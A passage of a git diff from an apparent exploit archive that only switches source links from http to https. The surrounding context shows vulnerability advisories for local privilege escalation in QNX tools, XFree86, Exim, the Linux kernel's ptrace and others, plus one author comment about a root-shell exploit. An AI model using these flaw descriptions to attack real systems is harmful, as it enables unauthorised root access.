https://www.securityfocus.com/bid/4901/info The QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. crttrap Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. diff --git a/exploits/linux/local/21500.txt b/exploits/linux/local/21500.txt index 8d03a986b..89e8908f8 100644 --- a/exploits/linux/local/21500.txt +++ b/exploits/linux/local/21500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4902/info +source: https://www.securityfocus.com/bid/4902/info The QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default. diff --git a/exploits/linux/local/21501.txt b/exploits/linux/local/21501.txt index dfe791fc2..682ab772c 100644 --- a/exploits/linux/local/21501.txt +++ b/exploits/linux/local/21501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4904/info +source: https://www.securityfocus.com/bid/4904/info When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. diff --git a/exploits/linux/local/21502.txt b/exploits/linux/local/21502.txt index 1eaabe362..a7339deab 100644 --- a/exploits/linux/local/21502.txt +++ b/exploits/linux/local/21502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4914/info +source: https://www.securityfocus.com/bid/4914/info It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information. diff --git a/exploits/linux/local/21503.sh b/exploits/linux/local/21503.sh index 4df20b33b..f09c9177d 100755 --- a/exploits/linux/local/21503.sh +++ b/exploits/linux/local/21503.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4915/info +source: https://www.securityfocus.com/bid/4915/info The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. diff --git a/exploits/linux/local/21504.sh b/exploits/linux/local/21504.sh index 83efe2ca8..37ba68262 100755 --- a/exploits/linux/local/21504.sh +++ b/exploits/linux/local/21504.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4916/info +source: https://www.securityfocus.com/bid/4916/info The QNX phgrafx-startup utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges. diff --git a/exploits/linux/local/21505.c b/exploits/linux/local/21505.c index 8d84ea941..e21fa860f 100644 --- a/exploits/linux/local/21505.c +++ b/exploits/linux/local/21505.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4917/info +source: https://www.securityfocus.com/bid/4917/info The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root. */ diff --git a/exploits/linux/local/21506.c b/exploits/linux/local/21506.c index 97ec0dddf..9d50a93d6 100644 --- a/exploits/linux/local/21506.c +++ b/exploits/linux/local/21506.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4918/info +source: https://www.securityfocus.com/bid/4918/info It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition. diff --git a/exploits/linux/local/21507.sh b/exploits/linux/local/21507.sh index 6d7cb221e..98aaf4e50 100755 --- a/exploits/linux/local/21507.sh +++ b/exploits/linux/local/21507.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4919/info +source: https://www.securityfocus.com/bid/4919/info The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges. diff --git a/exploits/linux/local/21538.c b/exploits/linux/local/21538.c index 5ab3e4785..f792f254d 100644 --- a/exploits/linux/local/21538.c +++ b/exploits/linux/local/21538.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5001/info +// source: https://www.securityfocus.com/bid/5001/info A vulnerability has been reported for simpleinit that may allow users to execute arbitrary commands as the superuser. diff --git a/exploits/linux/local/21568.c b/exploits/linux/local/21568.c index a29f00775..71cd2330f 100644 --- a/exploits/linux/local/21568.c +++ b/exploits/linux/local/21568.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5056/info +// source: https://www.securityfocus.com/bid/5056/info The Cisco VPN Client software is used to establish Virtual Private Network (VPN) connections between client machines and a Cisco VPN Concentrator. diff --git a/exploits/linux/local/21583.pl b/exploits/linux/local/21583.pl index 48ef8fef2..d93b36eff 100755 --- a/exploits/linux/local/21583.pl +++ b/exploits/linux/local/21583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21584.pl b/exploits/linux/local/21584.pl index 7b87a69b5..39b0a56c6 100755 --- a/exploits/linux/local/21584.pl +++ b/exploits/linux/local/21584.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21585.c b/exploits/linux/local/21585.c index 658a405b7..339c31fb0 100644 --- a/exploits/linux/local/21585.c +++ b/exploits/linux/local/21585.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5125/info +// source: https://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. diff --git a/exploits/linux/local/21623.txt b/exploits/linux/local/21623.txt index 40034f93c..b266c09f6 100644 --- a/exploits/linux/local/21623.txt +++ b/exploits/linux/local/21623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5255/info +source: https://www.securityfocus.com/bid/5255/info Python is an open source, object oriented programming language. The Python Pickle module is provided to convert object variables into a serialized form ("pickling"), and later recover the data back into an object hierarchy ("unpickling"). diff --git a/exploits/linux/local/21624.py b/exploits/linux/local/21624.py index 086200e9a..14153a8d3 100755 --- a/exploits/linux/local/21624.py +++ b/exploits/linux/local/21624.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5257/info +source: https://www.securityfocus.com/bid/5257/info Python is an open source, object oriented programming language. The Python Pickle module is provided to convert object variables into a serialized form ("pickling"), and later recover the data back into an object hierarchy ("unpickling"). diff --git a/exploits/linux/local/21667.c b/exploits/linux/local/21667.c index 5ca057ad5..51b38325a 100644 --- a/exploits/linux/local/21667.c +++ b/exploits/linux/local/21667.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5352/info +// source: https://www.securityfocus.com/bid/5352/info The MM Shared Memory library is reported to be prone to a race condition with regards to temporary files which may enable a local attacker to gain elevated privileges. This issue may reportedly be exploited by an attacker with shell access as the Apache webserver user to gain root privileges on a vulnerable host. diff --git a/exploits/linux/local/21674.c b/exploits/linux/local/21674.c index 91d1d5427..4f7c8257c 100644 --- a/exploits/linux/local/21674.c +++ b/exploits/linux/local/21674.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5367/info +// source: https://www.securityfocus.com/bid/5367/info super is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/local/21683.c b/exploits/linux/local/21683.c index 997883456..e9c3d6f5e 100644 --- a/exploits/linux/local/21683.c +++ b/exploits/linux/local/21683.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5404/info +source: https://www.securityfocus.com/bid/5404/info The qmailadmin utility, developed by Inter7, is vulnerable to a buffer overflow condition. It is meant to run as a CGI program and is typically installed setuid (owned by root on some systems, regular users on others). qmailadmin fails to implement adequate bounds checking when processing an environment variable, resulting in a buffer overrun condition. diff --git a/exploits/linux/local/21700.c b/exploits/linux/local/21700.c index 6f9287323..4fba0b676 100644 --- a/exploits/linux/local/21700.c +++ b/exploits/linux/local/21700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5437/info +// source: https://www.securityfocus.com/bid/5437/info isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems. diff --git a/exploits/linux/local/21701.pl b/exploits/linux/local/21701.pl index 03bb54a2d..96744a212 100755 --- a/exploits/linux/local/21701.pl +++ b/exploits/linux/local/21701.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5437/info +source: https://www.securityfocus.com/bid/5437/info isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems. diff --git a/exploits/linux/local/21732.txt b/exploits/linux/local/21732.txt index 2ba6cf710..275bfeee5 100644 --- a/exploits/linux/local/21732.txt +++ b/exploits/linux/local/21732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5526/info +source: https://www.securityfocus.com/bid/5526/info scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21733.sh b/exploits/linux/local/21733.sh index 28b0f7f04..7c65c3cdd 100755 --- a/exploits/linux/local/21733.sh +++ b/exploits/linux/local/21733.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5529/info +source: https://www.securityfocus.com/bid/5529/info A vulnerability has been reported in Cobalt RaQ that may allow attackers to obtain elevated privileges. The vulnerability exists in the /usr/lib/authenticate utility which is used by Apache for authentication purposes. Reportedly, the utility creates temporary files with predictable names with world-writeable permissions. This vulnerability is further exacerbated by the fact that /usr/lib/authenticate is a setuid root binary. diff --git a/exploits/linux/local/21761.c b/exploits/linux/local/21761.c index 9d8c780ff..32d2e9046 100644 --- a/exploits/linux/local/21761.c +++ b/exploits/linux/local/21761.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +// source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21762.c b/exploits/linux/local/21762.c index cf344919e..4667b9813 100644 --- a/exploits/linux/local/21762.c +++ b/exploits/linux/local/21762.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +// source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21763.txt b/exploits/linux/local/21763.txt index 248a33315..7be36a871 100644 --- a/exploits/linux/local/21763.txt +++ b/exploits/linux/local/21763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5585/info +source: https://www.securityfocus.com/bid/5585/info Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems. diff --git a/exploits/linux/local/21793.txt b/exploits/linux/local/21793.txt index f8dd69117..6a9af3064 100644 --- a/exploits/linux/local/21793.txt +++ b/exploits/linux/local/21793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5708/info +source: https://www.securityfocus.com/bid/5708/info BRU is a backup and restore utility distributed by The Tolis Group. This problem affects the utility on the Linux platform. diff --git a/exploits/linux/local/21814.c b/exploits/linux/local/21814.c index f0fea6a38..e8163fafd 100644 --- a/exploits/linux/local/21814.c +++ b/exploits/linux/local/21814.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5767/info +// source: https://www.securityfocus.com/bid/5767/info Alsaplayer is a PCM player that utilizes the ALSA libraries and drivers. It is availabe for Linux and Unix platforms. diff --git a/exploits/linux/local/21865.c b/exploits/linux/local/21865.c index c4e57b33b..5c01d5f81 100644 --- a/exploits/linux/local/21865.c +++ b/exploits/linux/local/21865.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5805/info +// source: https://www.securityfocus.com/bid/5805/info Interbase is a SQL database distributed and maintained by Borland. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21871.c b/exploits/linux/local/21871.c index dbc09a05f..6d9b3927e 100644 --- a/exploits/linux/local/21871.c +++ b/exploits/linux/local/21871.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5808/info +// source: https://www.securityfocus.com/bid/5808/info gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21872.c b/exploits/linux/local/21872.c index 46ef04cbe..a7340c9b4 100644 --- a/exploits/linux/local/21872.c +++ b/exploits/linux/local/21872.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5808/info +// source: https://www.securityfocus.com/bid/5808/info gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/local/21980.c b/exploits/linux/local/21980.c index c1e11aac1..606615594 100644 --- a/exploits/linux/local/21980.c +++ b/exploits/linux/local/21980.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6094/info +source: https://www.securityfocus.com/bid/6094/info Vulnerabilities have been discovered in two files used by Abuse. diff --git a/exploits/linux/local/22002.txt b/exploits/linux/local/22002.txt index c3d3c045f..98f1942fc 100644 --- a/exploits/linux/local/22002.txt +++ b/exploits/linux/local/22002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6146/info +source: https://www.securityfocus.com/bid/6146/info A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default. diff --git a/exploits/linux/local/22014.c b/exploits/linux/local/22014.c index 599a4bd7c..e5fac62af 100644 --- a/exploits/linux/local/22014.c +++ b/exploits/linux/local/22014.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6166/info +// source: https://www.securityfocus.com/bid/6166/info A vulnerability has been discovered in Traceroute-nanog. It has been reported that Traceroute-nanog contains a buffer overflow condition. diff --git a/exploits/linux/local/22055.txt b/exploits/linux/local/22055.txt index ac9c20a70..a799abc0e 100644 --- a/exploits/linux/local/22055.txt +++ b/exploits/linux/local/22055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6282/info +source: https://www.securityfocus.com/bid/6282/info An information disclosure vulnerability has been reported for SuidPerl. Reportedly, it is possible for an attacker to determine whether files exist in non-accessible directories. diff --git a/exploits/linux/local/22066.c b/exploits/linux/local/22066.c index e30e4a2b5..ba9233188 100644 --- a/exploits/linux/local/22066.c +++ b/exploits/linux/local/22066.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6314/info +// source: https://www.securityfocus.com/bid/6314/info A format string vulnerability has been discovered in Exim. The problem occurs in the daemon_go() function. By supplying malicious format strings via the command line, it is possible for an attacker to execute arbitrary code with root privileges. diff --git a/exploits/linux/local/22128.c b/exploits/linux/local/22128.c index 99677f469..88fe8ee09 100644 --- a/exploits/linux/local/22128.c +++ b/exploits/linux/local/22128.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6527/info +// source: https://www.securityfocus.com/bid/6527/info A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. diff --git a/exploits/linux/local/22189.txt b/exploits/linux/local/22189.txt index 0a705a4c4..68625eea7 100644 --- a/exploits/linux/local/22189.txt +++ b/exploits/linux/local/22189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6656/info +source: https://www.securityfocus.com/bid/6656/info mtink is prone to a locally exploitable buffer overflow condition. This is due to insufficient bounds checking of the HOME environment variable. diff --git a/exploits/linux/local/22190.txt b/exploits/linux/local/22190.txt index f94a29a07..a35c083c2 100644 --- a/exploits/linux/local/22190.txt +++ b/exploits/linux/local/22190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6658/info +source: https://www.securityfocus.com/bid/6658/info It has been reported that a buffer overflow in escputil exists. When supplied with excessively long arguments, it is possible to overwrite stack memory. diff --git a/exploits/linux/local/22212.txt b/exploits/linux/local/22212.txt index b1aef42b5..99c3adb68 100644 --- a/exploits/linux/local/22212.txt +++ b/exploits/linux/local/22212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6751/info +source: https://www.securityfocus.com/bid/6751/info A vulnerability has been discovered in QNX Real-Time Operating System. It has been reported that an unauthorized user may access arbitrary files. This is possible by requesting the file through the location that the FAT partition is mounted to. Accessing files in this manner ignores all permissions set by the operating system. diff --git a/exploits/linux/local/22233.c b/exploits/linux/local/22233.c index c6f0ac1cb..87a358d0c 100644 --- a/exploits/linux/local/22233.c +++ b/exploits/linux/local/22233.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +// source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22234.c b/exploits/linux/local/22234.c index 2465c63eb..f9143c897 100644 --- a/exploits/linux/local/22234.c +++ b/exploits/linux/local/22234.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +// source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22235.pl b/exploits/linux/local/22235.pl index b850914a6..024463412 100755 --- a/exploits/linux/local/22235.pl +++ b/exploits/linux/local/22235.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6806/info +source: https://www.securityfocus.com/bid/6806/info By passing an overly large string when invoking nethack, it is possible to corrupt memory. diff --git a/exploits/linux/local/22265.pl b/exploits/linux/local/22265.pl index e58aca6c2..a095be7eb 100755 --- a/exploits/linux/local/22265.pl +++ b/exploits/linux/local/22265.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6885/info +source: https://www.securityfocus.com/bid/6885/info It has been reported that cPanels' openwebmail package, distributed as part of the cPanel CGI application, is vulnerable to an external file include vulnerability. Exploitation of this issue may result in local user privilage escalation. diff --git a/exploits/linux/local/22320.c b/exploits/linux/local/22320.c index 613c3d609..8ad9ecaef 100644 --- a/exploits/linux/local/22320.c +++ b/exploits/linux/local/22320.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22321.c b/exploits/linux/local/22321.c index b6fcce12e..414815d16 100644 --- a/exploits/linux/local/22321.c +++ b/exploits/linux/local/22321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22322.c b/exploits/linux/local/22322.c index 11802cf41..fc19a68d3 100644 --- a/exploits/linux/local/22322.c +++ b/exploits/linux/local/22322.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22323.c b/exploits/linux/local/22323.c index 7ab6c1fa5..94d6ff41c 100644 --- a/exploits/linux/local/22323.c +++ b/exploits/linux/local/22323.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7002/info +// source: https://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable. diff --git a/exploits/linux/local/22326.c b/exploits/linux/local/22326.c index f2b0b0e71..4565d0bc1 100644 --- a/exploits/linux/local/22326.c +++ b/exploits/linux/local/22326.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7009/info +// source: https://www.securityfocus.com/bid/7009/info It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. diff --git a/exploits/linux/local/22340.txt b/exploits/linux/local/22340.txt index ff3f8bab5..9c1d94abe 100644 --- a/exploits/linux/local/22340.txt +++ b/exploits/linux/local/22340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7052/info +source: https://www.securityfocus.com/bid/7052/info A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges. diff --git a/exploits/linux/local/22344.txt b/exploits/linux/local/22344.txt index e0efca93e..57b354acd 100644 --- a/exploits/linux/local/22344.txt +++ b/exploits/linux/local/22344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7066/info +source: https://www.securityfocus.com/bid/7066/info It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands. diff --git a/exploits/linux/local/22362.c b/exploits/linux/local/22362.c index a530c6163..488c0f368 100644 --- a/exploits/linux/local/22362.c +++ b/exploits/linux/local/22362.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7112/info +source: https://www.securityfocus.com/bid/7112/info A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges. diff --git a/exploits/linux/local/22363.c b/exploits/linux/local/22363.c index 26d629435..8368ecd06 100644 --- a/exploits/linux/local/22363.c +++ b/exploits/linux/local/22363.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7112/info +source: https://www.securityfocus.com/bid/7112/info A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges. diff --git a/exploits/linux/local/22376.txt b/exploits/linux/local/22376.txt index 17f2c698c..d50d7bfc8 100644 --- a/exploits/linux/local/22376.txt +++ b/exploits/linux/local/22376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7121/info +source: https://www.securityfocus.com/bid/7121/info GNOME Eye of Gnome (EOG) image viewer is prone to a format string vulnerability. This condition may lead to execution of arbitrary code if malicious format specifiers are supplied to the program via the command line. As some utilities may be configured to invoke EOG as the handler for images through a mailcap entry, this may allow for local privilege escalation or possibly remote exploitation. diff --git a/exploits/linux/local/22452.sh b/exploits/linux/local/22452.sh index e74f1be08..30f970d00 100755 --- a/exploits/linux/local/22452.sh +++ b/exploits/linux/local/22452.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7263/info +source: https://www.securityfocus.com/bid/7263/info A vulnerability in ChiTex has been reported that may allow local users to obtain root privileges on vulnerable systems. The vulnerability exists due to the existence of two setuid root binaries that execute the 'cat' program without an absolute path. diff --git a/exploits/linux/local/22456.txt b/exploits/linux/local/22456.txt index 800b7a990..683e1aaa8 100644 --- a/exploits/linux/local/22456.txt +++ b/exploits/linux/local/22456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7272/info +source: https://www.securityfocus.com/bid/7272/info It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. diff --git a/exploits/linux/local/22458.c b/exploits/linux/local/22458.c index 93e05626b..3967627ea 100644 --- a/exploits/linux/local/22458.c +++ b/exploits/linux/local/22458.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7279/info +source: https://www.securityfocus.com/bid/7279/info A weakness has been discovered on various systems that may result in an attacker gaining information pertaining to the existence of inaccessible files. The problem lies in the return times when attempting to access existent and non-existent files. diff --git a/exploits/linux/local/22531.pl b/exploits/linux/local/22531.pl index c956cba42..29ef04c38 100755 --- a/exploits/linux/local/22531.pl +++ b/exploits/linux/local/22531.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7421/info +source: https://www.securityfocus.com/bid/7421/info SAP Database SDBINST has been reported prone to a race condition vulnerability. diff --git a/exploits/linux/local/22538.pl b/exploits/linux/local/22538.pl index 45bfafbd0..e4cef13dc 100755 --- a/exploits/linux/local/22538.pl +++ b/exploits/linux/local/22538.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7433/info +source: https://www.securityfocus.com/bid/7433/info Libopt library has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22540.c b/exploits/linux/local/22540.c index 02266ef20..e94981766 100644 --- a/exploits/linux/local/22540.c +++ b/exploits/linux/local/22540.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7437/info +// source: https://www.securityfocus.com/bid/7437/info The linux-atm 'les' executable has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22565.c b/exploits/linux/local/22565.c index e01876e0b..637750b9b 100644 --- a/exploits/linux/local/22565.c +++ b/exploits/linux/local/22565.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7500/info +// source: https://www.securityfocus.com/bid/7500/info MySQL has been reported to implement a weak password encryption algorithm. It has been reported that the MySQL function used to encrypt MySQL passwords makes just one pass over the password and employs a weak left shift based cipher. The hash may be cracked in little time using a bruteforce method. diff --git a/exploits/linux/local/22567.c b/exploits/linux/local/22567.c index 67943c028..2d3da006a 100644 --- a/exploits/linux/local/22567.c +++ b/exploits/linux/local/22567.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7505/info +source: https://www.securityfocus.com/bid/7505/info Multiple vulnerabilities have been reported for Leksbot. The precise nature of these vulnerabilities are currently unknown however, exploitation of this issue may result in an attacker obtaining elevated privileges. This is because in some installations, the Leksbot binary may be installed setuid. */ @@ -7,7 +7,7 @@ Multiple vulnerabilities have been reported for Leksbot. The precise nature of t /* by gunzip * KATAXWR/leksbot local root exploit * for Debian Linux 3.0 - * http://www.securityfocus.com/bid/7505 + * https://www.securityfocus.com/bid/7505 * change command if you don't like it (gives a root shell in /tmp/ash) * http://members.xoom.it/gunzip . more to come */ diff --git a/exploits/linux/local/22594.c b/exploits/linux/local/22594.c index ecb3dffd6..8d9c26fa4 100644 --- a/exploits/linux/local/22594.c +++ b/exploits/linux/local/22594.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7565/info +// source: https://www.securityfocus.com/bid/7565/info CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function. diff --git a/exploits/linux/local/22616.pl b/exploits/linux/local/22616.pl index 6dbbbcdcc..c309a378e 100755 --- a/exploits/linux/local/22616.pl +++ b/exploits/linux/local/22616.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7632/info +source: https://www.securityfocus.com/bid/7632/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22617.c b/exploits/linux/local/22617.c index cc674a4d4..15d4a0a4d 100644 --- a/exploits/linux/local/22617.c +++ b/exploits/linux/local/22617.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7632/info +// source: https://www.securityfocus.com/bid/7632/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22633.c b/exploits/linux/local/22633.c index 2b494ef82..fc040042f 100644 --- a/exploits/linux/local/22633.c +++ b/exploits/linux/local/22633.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7663/info +// source: https://www.securityfocus.com/bid/7663/info Polymorph for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22640.c b/exploits/linux/local/22640.c index 8e3ca3061..f6bc9ff7a 100644 --- a/exploits/linux/local/22640.c +++ b/exploits/linux/local/22640.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7676/info +// source: https://www.securityfocus.com/bid/7676/info A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory. diff --git a/exploits/linux/local/22643.pl b/exploits/linux/local/22643.pl index 5bbe189d5..9c28ce57d 100755 --- a/exploits/linux/local/22643.pl +++ b/exploits/linux/local/22643.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22644.c b/exploits/linux/local/22644.c index c858a54ba..767c32a3e 100644 --- a/exploits/linux/local/22644.c +++ b/exploits/linux/local/22644.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +// source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22645.c b/exploits/linux/local/22645.c index 4c461fdfc..24b690b3a 100644 --- a/exploits/linux/local/22645.c +++ b/exploits/linux/local/22645.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7682/info +// source: https://www.securityfocus.com/bid/7682/info ifenslave for Linux has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/local/22695.pl b/exploits/linux/local/22695.pl index bf8d1a594..ca939304b 100755 --- a/exploits/linux/local/22695.pl +++ b/exploits/linux/local/22695.pl @@ -1,4 